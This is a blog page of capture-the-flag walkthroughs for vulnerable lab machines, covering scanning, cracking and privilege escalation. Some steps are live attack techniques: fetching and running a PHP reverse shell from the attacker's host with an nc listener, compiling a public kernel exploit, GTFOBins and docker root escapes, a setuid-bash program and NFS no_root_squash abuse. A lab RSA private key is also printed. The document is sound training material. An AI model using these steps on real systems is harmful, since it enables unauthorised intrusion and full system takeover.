Samdup
Resume
About me

Blog

Hire Me
No results found.

Let’s pwn cybersploit machine

Overview: 

Target Machine IP Address: 192.168.56.40
My Machine IP Address: 192.168.56.20

Mission: 

THIS IS A MACHINE FOR COMPLETE BEGINNER, THERE ARE THREE FALGS AVAILABLE IN THIS VM.

FROM THIS VMs YOU WILL LEARN ABOUT ENCODER-DECODER & EXPLOIT-DB.

Download:

You can download the machine from here.
************************************ Information Gathering & Scanning Process: 
sudo arp-scan --interface=eth0 192.168.56.1/24
nmap -sC -sV -p- 192.168.56.40 -o nmap.log
  
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
username:itsskv
cybersploit CyBeRSplOiT I ran nikto but didn’t get information but gobuster did give me something.. 
gobuster dir -u 192.168.56.40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
http://192.168.56.40/robots.txt
    
R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9
Let’s decrypt the string… 
echo "R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9" | base64 -d
Flag1: cybersploit{youtube.com/c/cybersploit}
By the way,  you might be wondering what is at http://192.168.56.40/hacker  (it was just a gif). Ok since, we got the username: itsskv And password:  cybersploit{youtube.com/c/cybersploit} And the box is running ssh, how about we try that first? 
ssh itsskv@192.168.56.40
ls -lah
cat flag2.txt
I used this website to decrypt. https://cryptii.com/pipes/binary-to-english 
good work !
flag2: cybersploit{https:t.me/cybersploit1}
uname -a
3.13.0-32-generic
Google  3.13.0-32-generic exploit   searchsploit didn’t work for me (I will figure this out later)   
https://www.exploit-db.com/exploits/37292

 gcc 37292.c -o exploit

./exploit
flag3: cybersploit{Z3X21CW42C4 many many congratulations !}
That’s it guys! Going to have breakfast now … little hungry lol Wish you a productive day!!
No Comments
CERT, Cybersploit, Digital Security, Penetration Testing, tcert, tcert.net, Tibet, tibet cert

Let’s take down victim01

Overview: 

Pwned Machine IP Address: 192.168.56.38
My Machine IP Address: 192.168.56.20

Mission: 

To gain access to root and read the flag file Flag.txt.

Download:

You can download the machine from here.
************************************ Information Gathering & Scanning Process: 
sudo arp-scan --interface=eth0 192.168.56.1/24
nmap -sC -sV -p- -o nmap.log 192.168.56.38
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 8080/tcp open http BusyBox httpd 1.13 8999/tcp open http WebFS httpd 1.21 9000/tcp open http PHP cli server 5.5 or later (PHP 7.2.30-1) 
http://192.168.56.38:8999
Let’s download WPA-01.cap Let’s run the packet in wireshark 
wireshark WPA-01.cap &
I tried my best to dive into the cap file, I was not able to get any anything concrete. Based on our previous machine that we did, I am having a hunch that we will get a username and a password out of this. Although it shows many connected devices to the router (dlink), only dlink did work as a username. You might be wondering how I got the password?  You might know if you have read this post. Yeah I did run aircrack-ng on the CAP file with rockyou file. 
aircrack-ng WPA-01.cap -w /usr/share/wordlists/rockyou.txt
Yes, the password is p4ssword 
ssh dlink@192.168.56.38        password: p4ssword
I made it a habit that as soon as I get a limited (or user shell), I do manually check all the low hanging fruits. Such as sudo -l cat ~/.viminfo crontab -l history find / -perm -u=s -type f 2>/dev/null find / -perm 0777 -type f 2>/dev/null find / -writable -type d 2>/dev/null to name a few. If I don’t find anything then I use linpeas.sh and other scripts, by uploading those to /tmp folder of that limited user account. We found something interesting. 
https://gtfobins.github.io/gtfobins/nohup/
Note: kindly bookmark this website site. https://gtfobins.github.io/   
nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
yeah, we got the flag.. Method 2: To check writeable directory 
find / -writable -type d 2>/dev/null 


/var/www/bolt/public/files  it has the 777 permissions
If you have carefully read the output from nmap, you might have seen that the server is running PHP cli server. That means we can upload a php reverse shell. Let’s do that.. On Kali Machine I have downloaded and stored my shells and other tools at /opt python -m SimpleHTTPServer 8000 On Victim01 Machine cd /var/www/bolt/public/files/ wget 192.168.56.33:8000/php-reverse-shell.php chmod +x php-reverse-shell.php And also change the IP address and Port of your choice. Mine IP: 192.168.56.33 Port:1234 Let’s set up an nc setup on Kali Machine to receive a reverse connection from the Victim01 machine.   I tried to execute the PHP shell on the victim machine to get the reverse connection and I get a limited shell. However, when I try to view the PHP shell through the browser, I got a shell with root privilege. To be honest, I don’t know what is the primary reason behind it and I think I will need to explore more on this. However, I am gonna keep this in mind while I do shelling other boxes in the future. yes, another way to get root! That’s all guys 🙂
No Comments
oscp, Penetration Testing, tcert, tcert.net, tibet cert, vulhub

Pwning Pwned

Overview: 

Pwned Machine IP Address: 192.168.56.37
My Machine IP Address: 192.168.56.20

Mission: 

To gain access to root and read the flag file Flag.txt.

Download:

You can download the machine from here.
************************************ To know the IP address of the Target Machine: 
 sudo arp-scan --interface=vboxnet0 192.168.56.1/24

Scanning: 

nmap -sC -sV  -p- 192.168.56.37 -o nmap.log
 Output: 
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
Let’s get a glimpse of the website first because the machine is running an apache web server. Attacker name: 
Annlynn
After the attacker’s name, I didn’t get any. So, usually, I like to check robots.txt http://192.168.56.37/robots.txt It redirects to some files and I won’t go through it here because it was a rabbit hole. I did run Nikto scanner and got a little information but it was nothing special, as it just gave me things which I got earlier. (The folder called nothing. That’s all)   Gobuster Scanner: 
dir -u 192.168.56.37 -w /usr/share/wordlists/directory-list-2.3-medium.txt -o gobuster.log
We got a new file, called hidden_text. This experience taught me an important lesson, i.e. never depend on a single tool for everything. 
http://192.168.56.37/hidden_text/
I tried every parameter and, I thought to automate the process either through Burp Suite or a shell command. Perhaps, after this task is over, I will write a script to automate this task for us. 
http://192.168.56.37/pwned.vuln/
View source code: 
ftpuser' && $pw=='B0ss_B!TcH'

Exploitation:

Well, credential didn’t work with about login panel, so let us try with FTP (we know the machine is running FTP through Nmap scan.) Yes, I was able to log into the machine by using the above credentials However, I think it is important to pass -a as argument along with the command dir -a. Because although I was not able to see anything despite the command executed successfully. I found two files in there. It looks like important because one file is an ssh key and other note content username. Probably we could get access by using this information. username: ariana password: ssh private key Remember before using an SSH key, set the permission to either 400 or 600. (usually, I like 400 on production and 600 when I am trying something like a pwning machine). 
chmod 600 id_rsa
ssh ariana@192.168.56.37 -i id_rsa
Yes, we got a shell here. Usually, as soon as I get a shell, I like to try some low hanging fruits first. Like what is shown in the screenshot. So far we got this information: User ariana may run the following commands on pwned: (selena) NOPASSWD: /home/messenger.sh 
cat /home/messenger.sh  (make a mental note)
congratulations you Pwned ariana

Here is your user flag _______

fb8d98be1265dd88bac522e1b2182140

Try harder.need become root
To be honest, I am yet to have breakfast and thought to grasp some but because of this flag, I am gonna stick with the machine sometimes more. I found a diary called ariana-personal.diary It was written It’s Ariana personal Diary ::: Today Selena fight with me for Ajay. so i opened her hidden_text on server. now she resposible for the issue. I didn’t get anything special, so how about we run the script that we got from above?  /home/messenger.sh 
sudo -u selena /home/messenger.sh
I struggled a little here and need to have a peek on other people’s walkthrough (it is here.) yes, it is perfect time to get an interactive shell. 
python3 -c 'import pty; pty.spawn("/bin/bash")'
id 

docker images 

docker run -v /:/mnt --rm -it privesc chroot /mnt sh
I got root here, however, I was not happy because I don’t know what this script (docker run -v /:/mnt –rm -it privesc chroot /mnt sh) does. So gonna do little research after breakfast… Wish you all a productive day!! Some Rabbit holes while I was digging the account of ariana. Other things, what I did I thought to find some SUID and SGID file manually, however, since I have linpeas.sh on my Kali Machine (192.168.56.33). So I am going to upload the shell from there to the target machine. That way, it will do everything automatically. chmod +x linpeas.sh (on target machine /tmp folder) While I was going through the extensive report from the linpeas.sh, I can definitely conclude that the machine is running an outdated docker container. 
ps aux | grep "docker"
1. Result excerpt from linpeas.sh 2. Result excerpt from linpeas.sh                
No Comments
docker, pwned, tcert, tcert.net, tibet cert, vulhub, Walkthrough, writeup

Writeup for Troll3 machine

Overview: 
Pumpkin Raising Machine IP Address: 192.168.56.26
My Machine IP Address: 192.168.56.1
Mission: 
To gain access to root and read the flag file Flag.txt.
To know the IP address of the Target Machine: sudo arp-scan --interface=vboxnet0 192.168.56.1/24 https://tcert.net/wp-content/uploads/2020/07/Screenshot-from-2020-07-07-08-44-11.png Scanning the Network nmap -sC -sV -p- 192.168.56.26 -o nmap.log
  • sC default nmap script
  • sV reveal what services are running on the target machine with respective version numbers -p- it means scan all the ports (65535) -o ouput save to nmap.log
When I look at the vm, I can see that there is start:here. I tried ssh with start as username and here as the password Since the user “start” not a sudo user therefore, I was not able to know what sudo command it could run. However, there were two folders.
  • bluepill
    • awesome_work
  • redpill
    • this_will_surely_work
Both awesome_work and this_will_surely_work are ASCII text file.   bluepill has a shorten link, I am afraid it might automatically do some drive-by attack at hind, so let’s do a virustotal scan.   Virustotal report didn’t show any threat. (nevertheless, some good cryptor could bypass such scan and let’s not discuss it here) Now, let’s unshorten the link. There are many free services available online and you can choose based on your preference.     Ok, it’s just a rabbit hole. cat redpill/this_will_surely_work Another rabbit hole : ( Let’s enumerate the target machine, whether it has only binary or file which has enabled SUID or SGID. find / -perm 0777 -type f 2>/dev/null Since, I am using uBuntu Desktop, I need to install openssh-server package to receive binaries from the target machine. 
sudo apt install openssh-server -y

sudo systemctl start ssh

scp /var/log/.dist-manage/wytshadow.cap researcher@192.168.56.1:/home/researcher/vulhub/Troll3/2
Narration: I am trying to transfer wytshadow.pcap file from the victim machine to my local machine at /home/researcher/vulhub/Troll3/2   Transfer the gold_star.txt (looks like it is list of password dictionary) We can analyze the wytshadow.cap with Wireshark (GUI) software. However, we will try to analyze it with tcpdump (Terminal) software. tcpdump  pending By the look of it, I am going to guess wytshadow as username and password are in the .cap file. We can crack the password using aircrack-ng package with password dictionary list which we got from the victim machine – gold_star.txt . aircrack-ng -w gold_star.txt wytshadow.cap gaUoCe34t1 ssh wytshadow@192.168.56.26 password: gaUoCe34t1   
./oohfun

control+c to stop the execution
I checked crontab and no entry was there. let’s figure out whether any sudo enabled binary is there. 
password: gaUoCe34t1
Yes, we got something Let’s checkout nginx configuration file, enumerate on which port it is listening. You might think why I am all of sudden taking interest in the config file. It’s because sudo is enabled on nginx. Therefore, I am trying to find some information which could be leveraged. cat /etc/nginx/sites-enabled/default You can see that there is a service Lynx is going to run on port 8080, if nginx runs. Let’s verify whether is there any process running with port 8080. netstat -ntap Actually, this is a redundant task because we know that from the nmap.log result, we can conclude that no service is running on port 8080. Anyway, let’s start the nginx service and, I need to google and get to know little bit about Lynx service 
/usr/sbin/service nginx start
now, Lynx is listening at port 8080. I understood now the usage of Lynx. It is more like a browser for the command line. You can read more from here. For our purpose, what we can do is 
lynx http://192.168.56.26:8080
genphlux:HF9nd0cR! 
ssh genphlux@192.168.56.26
password: HF9nd0cR! ls cat maleus copied the content of the maleus to key 
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwz5Hwer48U1t/Qi9JveuO+Z7WQlnmhOOs/2pZ0he/OyVsEFv
DsGib1wu/N8t+7h9JZK9x2GL33TXQBVCy6TxES90F1An+2DSza6lJPCyhcgK/DEp
yxSVt32A+lFo+PQJV6QYZlpRkek0MjUw5y/E5qZwdBypC55C4QzgQBN3+Lnuhuk4
u52xcK9/6/2N7JZCNYA21Tp1Uy9mty/65IT7OwKJd2rXp3O6rZYTD/vPl+Rt/LtN
gA1DbDODq0NCmvcrZL+SafSj+MABA3LCERw01gA4RMdyxJU6hVfjeSKOdwDQOGWe
eAVCL2GR/frwyf+rfN1kbpdw/RGXWWwVANMcaQIDAQABAoIBAGNudFztrZo2NK2I
pcwSl0kqN+dAQuLU0vgXVw6ibL2iPxlkOYrqUi8kY0mk32YyrolUEhJYO0Ox3W1l
Zn8PoTV/VUAKMlJzHOhi6PfHHSPEnNOSthYWhajM4cKZczxWC+v2RfbaSHBms45e
SGl0inJskRiRAAZKswSp6gq334FrS6Dwy1tiKvzCfR3kLQghV5U/PhFZCsq3xvAw
eXPx2toNtU2gYSGrKWTep+nAKM1neBxeZAujYuN4xJ5/Th2y0pyTvX9WEgzKPJ/G
PlYZYCUAKPCbabYSuZckjeiN1aS52AIFedECBfAIezOr08Wx/bI/xCOgBxrQgPrK
kRvlOYECgYEA5eCIEfdLhWdg3ltadYE0O5VAoXKrbxYWqSyw1Eyeqj0N1qD9Rsvg
jIQJazV5JcVBIF54f/jlCJozR5s5AELrY0Z/krea1lF5ecOSUQE3tp94298xzO3g
7BBe3g6pD56Cya/Vo0+YVQmAnBHLh6QIYvUUXXN2IyceT8fhEx5JA+sCgYEA2W4z
KKMVAdPxKcjVks1zdGmVlj1RsUkakYuLWV3jQe2w1naJrc37Khy5eWZaRJhXqeBb
1cvTMa+r/BF7jvItxglWoBJqXDxKI0a6KqWtloZL2ynoaBkAhR2btob6nSN63Bpg
ZYJKY1B5yYbDHK4k6QT7atn2g6DAv/7sW6skj/sCgYA16WTAIek6TjZvr6kVacng
N27C7mu6T8ncvzhxcc68SjlWnscHtYTiL40t8YqKCyrs9nr4OF0umUtxfbvujcM6
syv0Ms9DeDQvFGjaSpjQYbIsjrnVP+zCMEyvc2y+1wQBXRWTiXVGbEYXVC0RkKzO
2H+AMzX/pIr9Vvk4TJ//JQKBgFNJcy9NyO46UVbAJ49kQ6WEDFjQhEp0xkiaO3aw
EC1g7yw3m+WH0X4AIsvt+QXtlSbtWkA7I1sU/7w+tiW7fu0tBpGqfDN4pK1+mjFb
5XKTXttE4lF9wkU7Yjo42ib3QEivkd1QW05PtVcM2BBUZK8dyXDUrSkemrbw33j9
xbOhAoGBAL8uHuAs68ki/BWcmWUUer7Y+77YI/FFm3EvP270K5yn0WUjDJXwHpuz
Fg3n294GdjBtQmvyf2Wxin4rxl+1aWuj7/kS1/Fa35n8qCN+lkBzfNVA7f626KRA
wS3CudSkma8StmvgGKIU5YcO8f13/3QB6PPBgNoKnF5BlFFQJqhK
-----END RSA PRIVATE KEY-----
chmod 400 key
In my opinion, there might be username maleus and ssh key is the above key. Shall we try that ? 
ssh maleus@192.168.56.26 -i key
indeed, it did work! ls dont_even_bother file dont_even_bother We understood it is an ELF 64-bit LSB executable. Let’s execute it. (This approach is risk and provided you are a malware analyst, don’t execute anything on your host machine but virtual machine). ./dont_even_bother It is expecting a password and I did try things which I could think of. No luck 🙁 Let me run a strings command strings dont_even_bother | less We got something interesting screenshot xl8Fpx%6 just a rabbit hole cat /etc/os-release 
VERSION="18.04.2 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.2 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
I am a little desperate here because I was not able to find anything useful. I checked the kernel version, OS release, crontab entries, history, etc.. When I tried cat .viminfo | less guess what I got ? password: B^slc8I$ (I am not sure the use of it). Shall we try sudo -i ? No, it is not the password: B^slc8I$ (let’s keep with us a little while) I tried sudo -l password: B^slc8I$ Yeh! Finally… We can use an exploit to escalate the privilege to root user.. because dont_even_bother is running with root privilege.. vi dont_even_bother 
#include
#include
#include<sys/types.h>

int main()
{
setuid(geteuid());
system("/bin/bash");
return 0;
}
:wq! (To get out from vim – for new users) source code credit To compile it 
gcc dont_even_bother.c -o dont_even_bother
some gibberish error may come, don’t worry about those.. Let’s execute our code sudo ./dont_even_bother
No Comments
CERT, Cyber Security, oscp, Red Team, Tibet, vulhub

Will I get a root access to PumpkinRaising Machine ?

Overview: 
Pumpkin Raising Machine IP Address: 192.168.56.17
My Machine IP Address: 192.168.56.1
Mission: 
Mission-Pumpkin v1.0 is a beginner level CTF series, created by keeping beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but struggling to apply known tools. I believe that machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinRaising is Level 2 of series of 3 machines under Mission-Pumpkin v1.0. The Level 1 ends by accessing PumpkinGarden_Key file, this level is all about identifying 4 pumpkin seeds (4 Flags - Seed ID’s) and gain access to root and capture final Flag.txt file.
Step 01: 
nmap -sC -sV -p- 192.168.56.17 -oN nmap.log
Output: 
Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-01 13:30 IST
Nmap scan report for 192.168.56.17

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    Apache httpd
| http-robots.txt: 23 disallowed entries (15 shown)
| /includes/ /scripts/ /js/ /secrets/ /css/ /themes/ 
| /CHANGELOG.txt /underconstruction.html /info.php /hidden/note.txt 
| /INSTALL.mysql.txt /seeds/seed.txt.gpg /js/hidden.js /comment/reply/ 
|_/filter/tips/
|_http-server-header: Apache
|_http-title: Mission-Pumpkin
Step 02: Actually, nmap is revealing enough information to go through however, let me stick with my methodology. Since it is clearly running a web server on port 80. Let’s visit the website and check their source code first. When I see there is an images folder. I was little excited because we got a beautiful tip in previous box. (It is here) Ops! Step 03: You can also see that there is a base64 encoded message in the source code. I thought this may reveal a big secret like it did in my previous pumpkin box. However, it just turned to be a little troll 🙂 As I was going  through the source code, I see a link to pumpkin.html I took down name of the characters in my note, perhaps I could use that for some bruteforce purpose because we know that the machine is running ssh on port 22 (through nmap scanning). In the source code, there is another encoded string, which is turn out to be base32. (I did some reading on base32 and tried myself to ensure that this string is base32). besides, if you scroll down to bottom, you will see there is some hex string with it. For time being, I save those hex to a file called hex.txt and keep it here for sometime, because we need to decode that base32 string. I did download that pcap file and tried to trace it in wireshark 1) 2) Follow the TCP Stream 3) 4) Based on figure 3 and 4, we can conclude that we got another seed. Do you see that? If not, see it closely.. 5. 6. To be honest, I didn’t see it at first, so what I did was, I know the SEED ID is 50609. So, I did run a string command and everything become very clear. See here 
strings spy.pcap
Hence we got a Jack-Be-Little Pumpkin seeds ID: 50609 Step 04: Don’t forget that we have an encoded hex string which need to be decoded. Here we go 
cat hex.txt | xxd -p -r
Acorn Pumpkin Seeds ID: 96454 Step 05: Let’s check the presence of robots.txt file Output: 
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/robotstxt.html

User-agent: *
Crawl-delay: 10
# CSS, JS, Images

# Directories
Disallow: /includes/
Disallow: /scripts/
Disallow: /js/
Disallow: /secrets/
Disallow: /css/
Disallow: /themes/

#Images
Allow: /images/*.gif
Allow: /images/*.jpg

# Files
Disallow: /CHANGELOG.txt
Disallow: /underconstruction.html
Disallow: /info.php
Disallow: /hidden/note.txt
Disallow: /INSTALL.mysql.txt
Disallow: /seeds/seed.txt.gpg
Disallow: /js/hidden.js


# Paths (clean URLs)
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /scripts/pcap
Disallow: /node/add/
Disallow: /security/gettips/
Disallow: /search/hidden/
Disallow: /user/addme/
Disallow: /user/donotopen/
Disallow: /user/
Disallow: /user/settings/
I must admit that when I see this exhaustive list, I was extremely excited however, out of all, only those bold colored where actually working (or revealing information that is of my interest). Step 04: While I was going through the folders (enshrined in the robots.txt), I found this interesting information . 
Robert : C@43r0VqG2=
Mark : Qn@F5zMg4T
goblin : 79675-06172-65206-17765
I thought it might be some SSH credentials (as you can see from the nmap result that ssh is running). However, it didn’t work. So I make a note of it and proceed with my enumeration. Step 05: I found another intriguing information at  192.168.56.101/seeds/seed.txt.gpg , see here. This file is encrypted with gpg subsequently, I did download the seed.txt.gpg googled the syntax to decrypt a pgp file. 
Syntax: 
gpg --decrypt seed.txt.gpg 
I tried different passwords which you got from above enumeration

Password: SEEDWATERSUNLIGHT
Probably you might think, how this guy got the password SEEDWATERSUNLIGHT ?  True, what I did was, I took down almost all words which I think could be password to a list and tried every one of them manually.  (Following screenshot is my note) By the way, I found this word from here. If you view the source code, you will know that the sign is nothing but a space. Do you see the space in source code?  (Don’t look at the selected strings)   see my failed attempt lol Finally I got this.. based on some google, I found that above pictorial representation is a mores code. So, we had to decode. You can simple google, decode mores code online tool. There are many online tools and out of those, I love this the most. Here is the link. https://gchq.github.io/CyberChef/ It has many other features as well and all you have to do is search mores code and chose the option, From Mores Code option. We got a SEED: BIGMAXPUMPKIN  SEEDS ID: 69507 I know little about stenography. After knowing that, I build a habit of myself to run exiftool, strings and stegosuite command to extract information out of any media files.  Trust me it is very tedious task however, it does pay you sometime out of nowhere lol. Having said that, one image really carried a text file with it. I couldn’t recall the exact box, however, once I was pwning a box when I select all the website, certain message just shows there. Therefore, I did a Control+A and do you see what I see in this message ?? From this image and our previous knowledge on this box, we can expect that there is a gif file called jackolantern.gif under images, which deduced to http://192.168.56.17/images/jackolantern.gif Truly there is an image by that name and the way, how author has hide this image in a meticulous way, it definitely speaks out a lot. Yes, after running stegosuite command with all the password. Finally we found something useful. command: 
stegosuite -x jackolantern.gif -k Qn@F5zMg4T

We were able to extract a text message called decorative.txt 

cat decorative.txt
We got another SEED ID i.e. Lil’ Pump-Ke-Mon Pumpkin seeds ID : 86568 I wish you to know that, it is not the result but I think we need to celebrate the process as well.. Like trying and enumerating everything that you could think of.. To attest what I am saying, I will enclosed one screenshot …:) If we read carefully of those note written on the website, we got hint that we need to arrange the pumpkin seed id in order. And At that time, this screenshot helped me to order them. Sequence of the respected pumpkin and their seedIDs: 
First one is called "Big Max Pumpkin": 69507


Second: "Jack-be-little": 50609


third: "Acorn Pumpkin": 96454

forth: "Little Pump-ke-Mon": 86568
I have tried many combinations to login to ssh with different users and passwords that we got so far… Here is the note. (many) failed attempts: (one example) I found that following credential gives us a shell. 
Username: jack
password: 69507506099645486568
Out of many rudimentary things like checking cron entries, SUID files, kernel etc. I check sudo user account .. 
sudo -l
My favourite goldmine site: https://gtfobins.github.io/ Run the command we got the root.. and the flag is here.. This box taught me many things and I am gonna revisit all the box I pwned again later.. just to evaluate did I really learn anything out of it 🙂 That’s all… Wish you all a very productive time 🙂  
No Comments
samdup, tcert

Vulnix walkthrough which bolstered my RHCSA knowledge

Hello everyone, I hope you all are doing well. Today, I am going to do a a machine to enhance my penetration testing skills and guess what, the machine did test my knowledge on RHCSA (RHEL8). The machine was easy but you can’t say it is easy until you have certain knowledge on NFS share (Network File System Share). I was like “finally the training I attended in Bangalore come to use now lol”. The machine name is called vulnix and you can easily get it from vulhub website. When I nmap (scan) the box, a huge list of running services were revealed and of course, you can enumerate each and every services (one by one), and that is actually a recommended way to learn or it is a way to get a better insight on the machine. This is actually I believe is how a professional pentester should approach to a machine. However, what I did was simply break the services into different categories and enumerate all the familiar services first. Ok, let’s do the box. As always my host Machine IP address is 192.168.56.1 
sudo arp-scan --interface=vboxnet0 192.168.56.1/24
Target Machine IP: 192.168.56.13 
nmap -sC -sV -p- 192.168.56.13 -oN nmap.log 

-sC running default nmap default script 
-sV enumerating services and version of services 
-p- It represent to check all the 65535 ports 
-oN output
I did an extra step here, however it is not necessary for you. I just did this to show the readers that  nfs version 2 to 4 is running. Therefore, we can exploit either 2 or 3. 4 is comparatively secure. To get a peek, you can do the following command to know which folder is mounting. To know a little about NFS:  click here and here.  
showmount -e 192.168.56.13
sudo mount -o vers=3 192.168.56.13:/home/vulnix mnt
    based on the output, we can be certain that there is a user named vulnix (/home/vulnix).  Now, what we need to do is create this user with UID 2008. 
sudo useradd --uid 2008 vulnix

sudo usermod -aG sudo vulnix
su vulnix 

cd /mnt 

mkdir .ssh 

ssh-keygen 
     
          ./id_rsa     (which means I would like have my keys saved in the current directory or /home/vulnix/mnt/.ssh, which is not the default path)
I divide the pane so that you can have the view of the both users (researcher and vulnix) Since from nmap result, we know that the machine is running with SSH. Therefore and we can try to login to the remote machine with the  SSH key which we generated previously on the target machine through nfs share. To know little more of SSH and configuration, click here. 
cat id_rsa.pub > authorized_keys

ssh -i id_rsa vulnix@192.168.56.13
sudo -l
sudoedit /etc/exports

add  

 /root *(rw,no_root_squash)

No Root Squash (link)

There are many options for NFS and I want to keep this article short but effective so I am leaving out many of the various configuration items that you could do. However there is one option that is worth mentioning, no_root_squash. By default NFS will downgrade any files created with the root permissions to the nobody user. This is a security feature that prevents privileges from being shared unless specifically requested. If I create a file as the root user on the client on the NFS share, by default that file is owned by the nobody user. 
 root@client:~# touch /shared/nfs1/file2 
 root@server:/nfs# ls -la file2
  -rw-r--r-- 1 nobody nogroup 0 Nov 18 18:06 file2
Sometimes it is important to share files that are owned as root with the proper permissions, in these cases this can be done by simply adding the no_root_squash attribute to the /etc/exports configuration.

Adding no_root_squash

Edit the /etc/exports file: 
 root@server:/nfs# vi /etc/exports
Modify the /nfs line to: 
 /nfs 192.168.0.195/32(rw,sync,no_root_squash)

In our case: 

/root *(rw,no_root_squash)     * represents all
Now, let’s reboot our vm to get those changes to the Target Machine. 
sudo mount -o vers=3 192.168.56.13:/root mnt
Now, we will use the previous concept that, we will generate a SSH key and try to login with it to get the root access. 
sudo -i  

cd /home/researcher/vulhub/vulnix/mnt 

cat trophy.txt
This flag looks weird though lol.. That’s it.. Later if I get time, I will populate this post with other enumerations as well (full of rabbit holes but good to look into).. it’s 23:58 and perfect time to all it a day 🙂  
No Comments
samdup, tcert

A walkthrough for Stapler

Hello and Tashi Delek everyone, Today I am going to do my level best to take down the staple – a vulnerable machine which was quite famous as it has many things that immitate live system which we use in the production line.  Besides, based on feedbacks shared by the people who cleared OSCP exam that this machine provides a close feeling of what we get in OSCP exam (1.0).  Therefore, I thought to give it a go.. As usual, my Kali Machine IP address is 192.168.56.1 and I need to figure out what is the IP address of the Target machine. For that we have couple of methods of ways to achieve this but, I found the following way quite fast, so I will stick with it. 
sudo arp-scan --interface=vboxnet0 192.168.56.1/24
Yes, the Target Machine IP address is: 192.168.56.4 Let’s nmap the IP address and try to learn what ports are open, running what kind of services and versions of the softwares, that way we could find some vulnerabilities. 
nmap -sC -sV -p- 192.168.56.4 -oN nmap.log
-sC  We are going to use the default script of the nmap -sV  We are going to check the services and versions of it -p-  We are going to run the scan for all 65535 ports -oN We are going to keep/save the output as nmap.log Since I am going to use these arguments again and again, I will not repeat the explanation of each arguments again and again. To minimize the verbosity. Output of Nmap Result: 
# Nmap 7.60 scan initiated Mon Apr 20 22:16:23 2020 as: nmap -sC -sV -p- -Pn -oN nmap.log 192.168.56.4
Nmap scan report for 192.168.56.4
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (EdDSA)
53/tcp    open   domain      dnsmasq 2.75
| dns-nsid: 
|_  bind.version: dnsmasq-2.75
80/tcp    open   http        PHP cli server 5.5 or later
|_http-title: 404 Not Found
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp   open   tcpwrapped
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.12-0ubuntu1
|   Thread ID: 9
|   Capabilities flags: 63487
|   Some Capabilities: LongPassword, Support41Auth, ConnectWithDatabase, SupportsCompression, FoundRows, SupportsTransactions, ODBCClient, DontAllowDatabaseTableColumn, IgnoreSigpipes, Speaks41ProtocolOld, LongColumnFlag, InteractiveClient, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: 12^\x151zj\x12N%Rxm-R\x1Ba/8E
|_  Auth Plugin Name: 88
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 5h29m56s, deviation: 0s, median: 5h29m56s
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
